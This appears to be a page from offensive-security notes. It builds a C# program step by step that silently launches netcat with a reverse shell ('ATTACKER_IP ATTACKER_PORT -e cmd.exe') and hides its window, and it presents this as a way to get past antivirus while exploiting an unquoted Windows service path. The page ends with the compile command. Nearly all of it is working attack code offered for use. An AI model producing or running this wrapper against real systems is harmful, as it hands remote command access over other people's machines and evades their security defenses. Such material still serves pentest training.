Executable Obfuscation

This technique was used to bypass AV while exploiting an Unquoted Service Path

Make an executable using C#

using System;
using System.Diagnostics;

These lines give us access to basic system functions like start new processes (netcat)

using System;
using System.Diagnostics;

namespace Wrapper{
    class Program{
        static void Main(){
            //Insert rest of code here!
        }
    }
}

This is for initializing a namespace and class for the program itself

using System;
using System.Diagnostics;

namespace Wrapper{
    class Program{
        static void Main(){
            Process proc = new Process();
            ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");
        }
    }
}

This will start the new netcat process and set the parameters

using System;
using System.Diagnostics;

namespace Wrapper{
    class Program{
        static void Main(){
            Process proc = new Process();
            ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");
            procInfo.CreateNoWindow = true;
        }
    }
}

The next added line makes it NOT create a new window while starting

using System;
using System.Diagnostics;

namespace Wrapper{
    class Program{
        static void Main(){
            Process proc = new Process();
            ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");
            procInfo.CreateNoWindow = true;
            proc.StartInfo = procInfo;
            proc.Start();
        }
    }
}

The last added line will fire off the new process

Compile the source code

mcs wrapper.cs

PreviousDisabling Windows Defender NextCompiling Code